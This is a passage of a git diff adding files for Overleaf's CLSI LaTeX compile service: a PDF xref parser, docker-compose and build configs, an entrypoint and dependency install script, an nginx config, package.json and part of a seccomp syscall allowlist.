httpAgent), + }) + url = fallbackURL + } else { + throw err + } + } + + const source = inferSource(url) + Metrics.inc('url_source', 1, { path: source }) + + const atomicWrite = filePath + '~' + try { + const output = fs.createWriteStream(atomicWrite) + await pipeline(stream, output) + await fs.promises.rename(atomicWrite, filePath) + Metrics.count('UrlFetcher.downloaded_bytes', output.bytesWritten, { + path: source, + }) + } catch (err) { + try { + await fs.promises.unlink(atomicWrite) + } catch (e) {} + throw err + } +} + +const BUCKET_REGEX = /\/bucket\/([^/]+)\/key\// + +function inferSource(url) { + if (url.includes(Settings.apis.clsiPerf.host)) { + return 'clsi-perf' + } else if (url.includes('/project/') && url.includes('/file/')) { + return 'user-files' + } else if (url.includes('/key/')) { + const match = url.match(BUCKET_REGEX) + if (match) return match[1] + } + return 'unknown' +} + +module.exports.promises = { + pipeUrlToFileWithRetry, +} diff --git a/services/clsi/app/js/XrefParser.js b/services/clsi/app/js/XrefParser.js new file mode 100644 index 0000000..5f2d154 --- /dev/null +++ b/services/clsi/app/js/XrefParser.js @@ -0,0 +1,67 @@ +const { NoXrefTableError } = require('./Errors') +const fs = require('node:fs') +const { O_RDONLY, O_NOFOLLOW } = fs.constants +const MAX_XREF_FILE_SIZE = 1024 * 1024 + +/** Parse qpdf --show-xref output to get a table of xref entries + * + * @param {string} filePath + * @param {number} pdfFileSize + * @returns + */ +async function parseXrefTable(filePath, pdfFileSize) { + try { + // the xref table will be written to output.pdfxref when available + const xRefFilePath = filePath + 'xref' + // check the size of the file (as it is untrusted) + const stats = await fs.promises.stat(xRefFilePath) + if (!stats.isFile()) { + throw new NoXrefTableError('xref file invalid type') + } + if (stats.size === 0) { + throw new NoXrefTableError('xref file empty') + } + if (stats.size > MAX_XREF_FILE_SIZE) { + throw new NoXrefTableError('xref file too large') + } + const content = await fs.promises.readFile(xRefFilePath, { + encoding: 'ascii', + flag: O_RDONLY | O_NOFOLLOW, + }) + // the qpdf xref table output looks like this: + // + // 3/0: uncompressed; offset = 194159 + // + // we only need the uncompressed objects + const matches = content.matchAll( + // put an upper limit of 10^10 on all the matched numbers for safety + // ignore the generation id in "id/gen" + // in a linearized pdf all objects must have generation number 0 + /^\d{1,9}\/\d{1,9}: uncompressed; offset = (\d{1,9})$/gm + ) + // include a zero-index object for backwards compatibility with + // our existing xref table parsing code + const xRefEntries = [{ offset: 0 }] + // extract all the xref table entries + for (const match of matches) { + const offset = parseInt(match[1], 10) + xRefEntries.push({ offset, uncompressed: true }) + } + if (xRefEntries.length === 1) { + throw new NoXrefTableError('xref file has no objects') + } + return { xRefEntries } + } catch (err) { + if (err instanceof NoXrefTableError) { + throw err + } else if (err.code) { + throw new NoXrefTableError(`xref file error ${err.code}`) + } else { + throw new NoXrefTableError('xref file parse error') + } + } +} + +module.exports = { + parseXrefTable, +} diff --git a/services/clsi/bin/.gitignore b/services/clsi/bin/.gitignore new file mode 100644 index 0000000..e69de29 diff --git a/services/clsi/bin/acceptance_test b/services/clsi/bin/acceptance_test new file mode 100644 index 0000000..fd2e513 --- /dev/null +++ b/services/clsi/bin/acceptance_test @@ -0,0 +1,4 @@ +#!/bin/bash +set -e; +MOCHA="node_modules/.bin/mocha --recursive --reporter spec --timeout 15000" +$MOCHA "$@" diff --git a/services/clsi/buildscript.txt b/services/clsi/buildscript.txt new file mode 100644 index 0000000..1834ac9 --- /dev/null +++ b/services/clsi/buildscript.txt @@ -0,0 +1,11 @@ +clsi +--data-dirs=cache,compiles,output +--dependencies= +--docker-repos=gcr.io/overleaf-ops,us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add=ENABLE_PDF_CACHING="true",PDF_CACHING_ENABLE_WORKER_POOL="true",ALLOWED_IMAGES=quay.io/sharelatex/texlive-full:2017.1,TEXLIVE_IMAGE=quay.io/sharelatex/texlive-full:2017.1,TEX_LIVE_IMAGE_NAME_OVERRIDE=gcr.io/overleaf-ops,TEXLIVE_IMAGE_USER="tex",DOCKER_RUNNER="true",COMPILES_HOST_DIR=$PWD/compiles,OUTPUT_HOST_DIR=$PWD/output +--env-pass-through= +--esmock-loader=False +--node-version=20.18.2 +--public-repo=True +--script-version=4.7.0 +--use-large-ci-runner=True diff --git a/services/clsi/docker-compose.ci.yml b/services/clsi/docker-compose.ci.yml new file mode 100644 index 0000000..1754a3a --- /dev/null +++ b/services/clsi/docker-compose.ci.yml @@ -0,0 +1,47 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + ENABLE_PDF_CACHING: "true" + PDF_CACHING_ENABLE_WORKER_POOL: "true" + ALLOWED_IMAGES: quay.io/sharelatex/texlive-full:2017.1 + TEXLIVE_IMAGE: quay.io/sharelatex/texlive-full:2017.1 + TEX_LIVE_IMAGE_NAME_OVERRIDE: gcr.io/overleaf-ops + TEXLIVE_IMAGE_USER: "tex" + DOCKER_RUNNER: "true" + COMPILES_HOST_DIR: $PWD/compiles + OUTPUT_HOST_DIR: $PWD/output + volumes: + - ./compiles:/overleaf/services/clsi/compiles + - /var/run/docker.sock:/var/run/docker.sock + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . + user: root diff --git a/services/clsi/docker-compose.yml b/services/clsi/docker-compose.yml new file mode 100644 index 0000000..3e70c25 --- /dev/null +++ b/services/clsi/docker-compose.yml @@ -0,0 +1,54 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + build: + context: ../.. + dockerfile: services/clsi/Dockerfile + target: base + volumes: + - .:/overleaf/services/clsi + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/clsi + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + + test_acceptance: + build: + context: ../.. + dockerfile: services/clsi/Dockerfile + target: base + volumes: + - .:/overleaf/services/clsi + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + - /var/run/docker.sock:/var/run/docker.sock + working_dir: /overleaf/services/clsi + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + ENABLE_PDF_CACHING: "true" + PDF_CACHING_ENABLE_WORKER_POOL: "true" + ALLOWED_IMAGES: quay.io/sharelatex/texlive-full:2017.1 + TEXLIVE_IMAGE: quay.io/sharelatex/texlive-full:2017.1 + TEX_LIVE_IMAGE_NAME_OVERRIDE: gcr.io/overleaf-ops + TEXLIVE_IMAGE_USER: "tex" + DOCKER_RUNNER: "true" + COMPILES_HOST_DIR: $PWD/compiles + OUTPUT_HOST_DIR: $PWD/output + command: npm run --silent test:acceptance + diff --git a/services/clsi/entrypoint.sh b/services/clsi/entrypoint.sh new file mode 100755 index 0000000..bb551c9 --- /dev/null +++ b/services/clsi/entrypoint.sh @@ -0,0 +1,14 @@ +#!/bin/sh + +# add the node user to the docker group on the host +DOCKER_GROUP=$(stat -c '%g' /var/run/docker.sock) +groupadd --non-unique --gid "${DOCKER_GROUP}" dockeronhost +usermod -aG dockeronhost node + +# compatibility: initial volume setup +mkdir -p /overleaf/services/clsi/cache && chown node:node /overleaf/services/clsi/cache +mkdir -p /overleaf/services/clsi/compiles && chown node:node /overleaf/services/clsi/compiles +mkdir -p /overleaf/services/clsi/db && chown node:node /overleaf/services/clsi/db +mkdir -p /overleaf/services/clsi/output && chown node:node /overleaf/services/clsi/output + +exec runuser -u node -- "$@" diff --git a/services/clsi/install_deps.sh b/services/clsi/install_deps.sh new file mode 100755 index 0000000..07711b2 --- /dev/null +++ b/services/clsi/install_deps.sh @@ -0,0 +1,24 @@ +#!/bin/bash +set -ex + +apt-get update + +apt-get install -y \ + poppler-utils \ + ghostscript \ + +rm -rf /var/lib/apt/lists/* + +# Allow ImageMagick to process PDF files. This is for tests only, but since we +# use the production images for tests, this will apply to production as well. +patch /etc/ImageMagick-6/policy.xml < + + +- + + +EOF diff --git a/services/clsi/kube.yaml b/services/clsi/kube.yaml new file mode 100644 index 0000000..d3fb042 --- /dev/null +++ b/services/clsi/kube.yaml @@ -0,0 +1,41 @@ +apiVersion: v1 +kind: Service +metadata: + name: clsi + namespace: default +spec: + type: LoadBalancer + ports: + - port: 80 + protocol: TCP + targetPort: 80 + selector: + run: clsi +--- +apiVersion: extensions/v1beta1 +kind: Deployment +metadata: + name: clsi + namespace: default +spec: + replicas: 2 + template: + metadata: + labels: + run: clsi + spec: + containers: + - name: clsi + image: gcr.io/henry-terraform-admin/clsi + imagePullPolicy: Always + readinessProbe: + httpGet: + path: status + port: 80 + periodSeconds: 5 + initialDelaySeconds: 0 + failureThreshold: 3 + successThreshold: 1 + + + diff --git a/services/clsi/nginx.conf b/services/clsi/nginx.conf new file mode 100644 index 0000000..604eb93 --- /dev/null +++ b/services/clsi/nginx.conf @@ -0,0 +1,117 @@ +# keep in sync with clsi-startup.sh files +# keep in sync with server-ce/nginx/clsi-nginx.conf +# Changes to the above: +# - added debug header + +server { + # Extra header for dev-env. + add_header 'X-Served-By' 'clsi-nginx' always; + + listen 8080; + server_name clsi-proxy; + server_tokens off; + access_log off; + # Ignore symlinks possibly created by users + disable_symlinks on; + # enable compression for tex auxiliary files, but not for pdf files + gzip on; + gzip_types text/plain; + gzip_proxied any; + types { + text/plain log blg aux stdout stderr; + application/pdf pdf; + } + + # user content domain access check + # The project-id is zero prefixed. No actual user project uses these ids. + # mongo-id 000000000000000000000000 -> 1970-01-01T00:00:00.000Z + # mongo-id 000000010000000000000000 -> 1970-01-01T00:00:01.000Z + # mongo-id 100000000000000000000000 -> 1978-07-04T21:24:16.000Z + # This allows us to distinguish between check-traffic and regular output traffic. + location ~ ^/project/0([0-9a-f]+)/user/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.pdf$ { + if ($request_method = 'OPTIONS') { + # handle OPTIONS method for CORS requests + add_header 'Allow' 'GET,HEAD'; + return 204; + } + alias /var/clsi/tiny.pdf; + } + location ~ ^/project/0([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.pdf$ { + if ($request_method = 'OPTIONS') { + # handle OPTIONS method for CORS requests + add_header 'Allow' 'GET,HEAD'; + return 204; + } + alias /var/clsi/tiny.pdf; + } + + # handle output files for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.([a-z.]+)$ { + if ($request_method = 'OPTIONS') { + # handle OPTIONS method for CORS requests + add_header 'Allow' 'GET,HEAD'; + return 204; + } + alias /output/$1-$2/generated-files/$3/output.$4; + } + # handle .blg files for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/build/([0-9a-f-]+)/output/(.+)\.blg$ { + if ($request_method = 'OPTIONS') { + # handle OPTIONS method for CORS requests + add_header 'Allow' 'GET,HEAD'; + return 204; + } + alias /output/$1-$2/generated-files/$3/$4.blg; + } + # handle output files for anonymous users + location ~ ^/project/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.([a-z.]+)$ { + if ($request_method = 'OPTIONS') { + # handle OPTIONS method for CORS requests + add_header 'Allow' 'GET,HEAD'; + return 204; + } + alias /output/$1/generated-files/$2/output.$3; + } + # handle .blg files for anonymous users + location ~ ^/project/([0-9a-f]+)/build/([0-9a-f-]+)/output/(.+)\.blg$ { + if ($request_method = 'OPTIONS') { + # handle OPTIONS method for CORS requests + add_header 'Allow' 'GET,HEAD'; + return 204; + } + alias /output/$1/generated-files/$2/$3.blg; + } + + # PDF range for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/content/([0-9a-f-]+/[0-9a-f]+)$ { + if ($request_method = 'OPTIONS') { + # handle OPTIONS method for CORS requests + add_header 'Allow' 'GET,HEAD'; + return 204; + } + # Cache for one day + expires 1d; + alias /output/$1-$2/content/$3; + } + # PDF range for anonymous users + location ~ ^/project/([0-9a-f]+)/content/([0-9a-f-]+/[0-9a-f]+)$ { + if ($request_method = 'OPTIONS') { + # handle OPTIONS method for CORS requests + add_header 'Allow' 'GET,HEAD'; + return 204; + } + # Cache for one day + expires 1d; + alias /output/$1/content/$2; + } + + # status endpoint for haproxy httpchk option + location /status { + return 200; + } + + # load shedding probe + location = /instance-state { + alias /var/clsi/instance-state; + } +} diff --git a/services/clsi/package.json b/services/clsi/package.json new file mode 100644 index 0000000..86566e0 --- /dev/null +++ b/services/clsi/package.json @@ -0,0 +1,52 @@ +{ + "name": "@overleaf/clsi", + "description": "A Node.js implementation of the CLSI LaTeX web-API", + "private": true, + "main": "app.js", + "scripts": { + "start": "node app.js", + "test:acceptance:_run": "mocha --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit:_run": "mocha --recursive --reporter spec $@ test/unit/js", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "nodemon": "node --watch app.js", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/settings": "*", + "archiver": "5.3.2", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "dockerode": "^4.0.5", + "express": "^4.21.2", + "lodash": "^4.17.21", + "p-limit": "^3.1.0", + "request": "^2.88.2", + "send": "^0.19.0", + "tar-fs": "^3.0.4", + "workerpool": "^6.1.5" + }, + "devDependencies": { + "@types/workerpool": "^6.1.0", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "mock-fs": "^5.1.2", + "node-fetch": "^2.7.0", + "sandboxed-module": "^2.0.4", + "sinon": "~9.0.1", + "sinon-chai": "^3.7.0", + "timekeeper": "2.2.0", + "typescript": "^5.0.4" + } +} diff --git a/services/clsi/patch-texlive-dockerfile b/services/clsi/patch-texlive-dockerfile new file mode 100644 index 0000000..61cb796 --- /dev/null +++ b/services/clsi/patch-texlive-dockerfile @@ -0,0 +1,3 @@ +FROM quay.io/sharelatex/texlive-full:2017.1 + +# RUN usermod -u 1001 tex diff --git a/services/clsi/scripts/demo-pdfjs-Xref.js b/services/clsi/scripts/demo-pdfjs-Xref.js new file mode 100644 index 0000000..1f55c57 --- /dev/null +++ b/services/clsi/scripts/demo-pdfjs-Xref.js @@ -0,0 +1,12 @@ +const fs = require('node:fs') +const { parseXrefTable } = require('../app/lib/pdfjs/parseXrefTable') + +const pdfPath = process.argv[2] + +async function main() { + const size = (await fs.promises.stat(pdfPath)).size + const { xRefEntries } = await parseXrefTable(pdfPath, size) + console.log('Xref entries', xRefEntries) +} + +main().catch(console.error) diff --git a/services/clsi/seccomp/clsi-profile.json b/services/clsi/seccomp/clsi-profile.json new file mode 100644 index 0000000..084354b --- /dev/null +++ b/services/clsi/seccomp/clsi-profile.json @@ -0,0 +1,841 @@ +{ + "defaultAction": "SCMP_ACT_ERRNO", + "architectures": [ + "SCMP_ARCH_X86_64", + "SCMP_ARCH_X86", + "SCMP_ARCH_X32" + ], + "syscalls": [ + { + "name": "getrandom", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "access", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "arch_prctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "brk", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "chdir", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "chmod", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "clock_getres", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "clock_gettime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "clock_nanosleep", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "clone", + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 2080505856, + "valueTwo": 0, + "op": "SCMP_CMP_MASKED_EQ" + } + ] + }, + { + "name": "close", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "copy_file_range", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "creat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "dup", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "dup2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "dup3", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "execve", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "execveat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "exit", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "exit_group", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "faccessat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fadvise64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fadvise64_64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fallocate", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchdir", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchmod", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchmodat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fcntl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fcntl64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fdatasync", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fork", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstat64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstatat64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstatfs", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstatfs64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fsync", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ftruncate", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ftruncate64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "futex", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "futimesat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getcpu", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getcwd", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getdents", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getdents64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getegid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getegid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "geteuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "geteuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getgid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getgroups", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getgroups32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpgrp", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getppid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpriority", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getresgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getresgid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getresuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getresuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getrlimit", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "get_robust_list", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getrusage", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getsid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "gettid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ioctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "kill", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "_llseek", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lseek", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lstat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lstat64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "madvise", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mkdir", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mkdirat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mmap", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mmap2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mprotect", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mremap", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "munmap", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "newfstatat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "open", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "openat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pause", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pipe", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pipe2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "prctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pread64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "preadv", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "prlimit64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pwrite64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pwritev", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "read", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "readlink", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "readlinkat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "readv", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rename", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "renameat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "renameat2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "restart_syscall", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rmdir", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigaction", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigpending", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigprocmask", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigqueueinfo", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigreturn", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigsuspend", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigtimedwait", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_tgsigqueueinfo", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_getaffinity", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_getparam", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_get_priority_max", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_get_priority_min", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_getscheduler", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_rr_get_interval", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_yield", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sendfile", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sendfile64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setgroups", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setgroups32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "set_robust_list", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "set_tid_address", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sigaltstack", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "stat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "stat64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "statfs", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "statfs64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sync", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sync_file_range", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "syncfs", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sysinfo", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "tgkill", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_create", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_delete", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_getoverrun", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_gettime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_settime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "times", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "tkill", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "truncate", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "truncate64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "umask", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "uname", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "unlink", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "unlinkat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "utime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "utimensat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "utimes", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "vfork", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "vhangup", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "wait4", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "waitid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "write", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "writev", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pread", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "capget", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "capset", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchown", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": 